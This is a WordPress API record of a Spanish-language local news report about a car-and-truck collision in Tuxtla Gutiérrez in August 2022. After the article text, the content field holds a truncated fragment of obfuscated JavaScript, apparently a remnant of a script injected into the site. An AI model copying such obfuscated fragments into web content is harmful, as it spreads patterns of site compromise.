{"id":4487,"date":"2022-08-17T03:19:47","date_gmt":"2022-08-17T03:19:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4487"},"modified":"2022-08-17T03:19:48","modified_gmt":"2022-08-17T03:19:48","slug":"auto-compacto-colisiona-contra-mole-de-acero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4487","title":{"rendered":"Auto compacto colisiona contra mole de acero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"541\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660706313930.jpg\" alt=\"\" class=\"wp-image-4488\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660706313930.jpg 960w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660706313930-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/FB_IMG_1660706313930-768x433.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p><div>Jairo Camacho.Agencia ReporteCiudadano ,  16 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un Chevrolet Aveo colision\u00f3 contra un cami\u00f3n de carga este martes en el Libramiento Sur Oriente de Tuxtla.Los reportes de tr\u00e1nsito dieron a conocer que, el cami\u00f3n circulaba en esta v\u00eda en el carril de Poniente a Oriente,  cuando el veh\u00edculo intent\u00f3 ganarle el paso cuando de manera repentina,  el cami\u00f3n de color blanco con rojo gir\u00f3 a la izquierda y debido a sus dimensiones no se percat\u00f3 de la acci\u00f3n de la peque\u00f1a unidad.Esto provoc\u00f3 que el compacto se impactara y qued\u00f3 bajo la plataforma,  generando un gran temor en los ocupantes del coche.Al lugar arribaron elementos de Tr\u00e1nsito quienes determinaron que el veh\u00edculo fue responsable del accidente. Al lugar arrib\u00f3 un ajustador de seguros,  para mediar con los conductores que finalmente llegaron a un acuerdo armonioso.<\/div><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano , 16 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un Chevrolet Aveo colision\u00f3 contra un cami\u00f3n de carga este martes en el Libramiento Sur Oriente de Tuxtla.Los reportes de tr\u00e1nsito dieron a conocer que, el cami\u00f3n circulaba en esta v\u00eda en el carril de Poniente a Oriente, cuando el veh\u00edculo intent\u00f3 ganarle &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4488,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4487","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4487"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4487\/revisions"}],"predecessor-version":[{"id":4489,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4487\/revisions\/4489"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4488"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4487"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}